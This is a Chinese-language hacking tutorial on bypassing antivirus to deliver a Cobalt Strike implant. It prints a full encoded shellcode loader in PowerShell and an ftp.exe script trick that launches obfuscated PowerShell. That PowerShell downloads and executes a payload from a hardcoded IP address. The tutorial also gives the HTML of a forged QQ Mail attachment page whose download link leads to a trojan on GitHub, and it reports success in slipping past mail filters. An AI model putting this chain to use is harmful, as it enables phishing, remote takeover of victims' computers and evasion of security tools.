FTP免杀Bypass杀软
CS服务端制作远程恶意ps1文件
CS服务端启动
./teamserver ip password然后客户端连上,然后建立监听器,之后生成powershell恶意文件
a.ps1文件内容如下
Set-StrictMode -Version 2function func_get_proc_address {Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}function func_get_delegate_type {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()
}If ([IntPtr]::size -eq 8) {[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbIUHlrquJimwQAIyNuEupicmJySSBicmKZdKq85dz2yHp4a6riaxLxaqr7bhLqcUsjIWOncXFimch2DRjc9muq5Wug4HNJKXxrqtJrqvlq5OPc3NzcbhLqcXFimQ4lO1jc9qbjLKa+IiMja9zsLKevIiMjyPDKxyIjI8uB3NzcDG1scE4jl9Q3hXUp9fRPVuH9WbLKaN5se7tMT0BlgZmvrcV+r0ShkTdH7utkonxfe3WIQe0cnI81osMHlBnLqkANbcvDHmoDWPW4ijtdkiN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMSEw0TGAN0Sk1HTFRQA213AxUNERgDdGx0FRcYA3dRSkdGTVcMFQ0TGANuZ2dgaXAKLikjfAiAg8dneFKGrLsYCuWdjdV1/ptJ5kNO+WalmZzRsV4+GAkWP30YK6xYlyKG64vWQKLAhFoj/pW0ErF9pza6oeo+VDl5muWs199sZPwWUka6a8xXniyuZ0sbBOCaeyBimRQe4V/luHMsc9E+88AvBRHifeJGRA8VSRvSKYuxwPtuZLcZ10h8H2IzGBCqN6aufowjyVYEFuHI6gwkdrL/pGs+gRpRjdLLbzdKrR+DUzsxVHgNKlG09JK2Tcr2k7aTx7sylWY9CwkUJHdM1vJYa9ojYp3TloF13PZrEuqZIyNjI2KbIzMjI2KaYyMjI2KZe4dwxtz2a7BwcGuqxGuq0muq+WKbIwMjI2qq2mKZMbWqwdz2a6DnA6bjV5VFqCRrIuCm41b0e3t7ayYjIyMjc+DLvN7c3BIRFw0RERMNEBQNEhQQIxn9S5I=')for ($x = 0; $x -lt $var_code.Count; $x++) {$var_code[$x] = $var_code[$x] -bxor 35}$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))$var_runme.Invoke([IntPtr]::Zero)
}制作恶意ftp命令执行
注意需要将起始位置置空,然后目标写入
C:\Windows\System32\ftp.exe -""s:good.dll-""s:aaa.dll:
-
- 这部分是传递给
ftp.exe的参数。
-s是ftp.exe的一个标准参数,用于指定一个包含 FTP 命令的脚本文件。
- 这部分是传递给
-
""是空字符串,是为了绕过某些安全检查或混淆命令。
- good.dll` 是一个动态链接库文件(DLL),通常用于扩展程序功能。
good.dll内容如下,原理是ftp命令模式下,输入!会命令执行
!cmd /c po^we^rs^he^ll -ex^ec b^yp^ass .\\bbb.ps1这是一种混淆的写法:
^是转义字符,用于绕过简单的字符串检测
-exec bypass是 PowerShell 的一个参数,用于绕过执行策略(Execution Policy),允许运行脚本。
.\bad.ps1:- 这是要执行的 PowerShell 脚本文件路径,表示当前目录下的
bad.ps1文件。
- 这是要执行的 PowerShell 脚本文件路径,表示当前目录下的
然后bad.ps1 写入powershell命令
powershell.exe -nOp -w hIdDEn -c $ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK("IE##X ((nE##w-ObJe##ct ('nE##T.wEB##cLiEnT')).('doWnl##OadStRiNg').inVo##KE('ht'+'tp:/'+'/11'+'2.22'+'3.37'+'.2'+'73:8'+'777/a'))".Replace("##",""))-
$ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK(...):创建一个新的脚本块并执行。
- 从指定 URL 下载内容并执行powershell脚本。
其中a文件是之前CS生产的powersshell命令文件,改一下名字就好了
只要打开快捷键,CS这边就会立刻上线
注:用此方法可过所有静态查杀,动态的查杀像360杀毒,win defender可绕过,国内某些杀软比如火绒一调用powershell进程就报可疑
整体文件夹如下
打包为zip上传到github复制下载链接,插入到伪造的html页面中的下载url中
<div id="qm_con_body"><div id="mailContentContainer" class="qmbox qm_con_body_content qqmail_webmail_only" style="opacity: 1;"><div id="attachment" a="" b="false" style="padding:2px;" class="attbg" ui-type="attCon"><div style="padding:6px 10px 10px 8px;" class="txt_left"><div style="height:14px;"> <b style="font-size:14px;"><img src="https://rescdn.qqmail.com/zh_CN/htmledition/images/spacer1e9c5d.gif" align="absmiddle" class="ico_att showattch" border="0" style="margin:-3px 2px 0 0;">附件</b>(<span id="attachmentCount">1</span> 个)</div></div><div style="padding:0 8px 6px 12px;background:#fff;_height:60px;line-height:140%;"><div class="graytext clear" style="padding-top:12px; padding-bottom:5px"><span style="color:#000;font-weight:bold;font-size:12px;">普通附件</span> <span id="span_ZL0012_1yrN1r~M_twu3KkAAIjVLc5_safe"> (<span class="ico_Avira"></span>已通过电脑管家云查杀引擎扫描)</span> </div><div class="att_bt attachitem"><div class="ico_big"><a id="AttachIconAZL0012_1yrN1r~M_twu3KkAAIjVLc50" attach="1" attid="请重点关注.docx" viewmode="doc" url="/cgi-bin/viewdocument?sid=lGnwl-6PmrgMcwZk&filename=1.docx&mailid=1&retry=true&t=attachments_content&ef=qfunc&s=yozo&fromattach=1" ck="previewAttach2" idx="0" filename="请重点关注.docx" down="/cgi-bin/download?mailid=1&filename=1.doc" iconurl="/zh_CN/htmledition/images/xdisk/ico_mid/fu_doc.gif" filebyte="15360" sparse2onlinedocurl=""><img style="width:auto;" src="/zh_CN/htmledition/images/xdisk/ico_mid/fu_doc.gif"></a></div><div class="name_big"> <span player="/cgi-bin/download?mailid=1&filename=1.docx&sid=1">请重点关注.docx</span><span class="graytext"> (15K<span id="span_attachIndex_ZL0012_1yrN1r~M_twu3KkAAIjVLc5_cd690305b12fa8de1acdd0ee2fc76181" style="display:none">, <span style="color: #C00;">附件包含病毒,请勿下载打开 </span></span>)</span><div class="down_big"><a ck="previewAttach" select="1" sparse2onlinedocurl="" down="/cgi-bin/download?mailid=1&filename=1.docx&sid=1">预览</a> <a href="github地址">下载</a> <a style="" flag="0" class="needSetFlag" attachkey="1|1.docx|1.docx|15360"><span>收藏</span></a><span style="display:none;" class="graytext"><span>已收藏, </span><a>查看</a></span> <a ui-type="netdiskBind" attid="1|1|1" class="netdisk_hide"><span>转存</span><span class="bind_down_icon"></span></a></div></div></div></div></div></div></div>通过html页面伪装为查杀后的docx文件,实际链接是木马下载地址
实际编辑的可视化效果如下图
实际测试成功绕过邮箱检测发送给收件人,收件效果如下
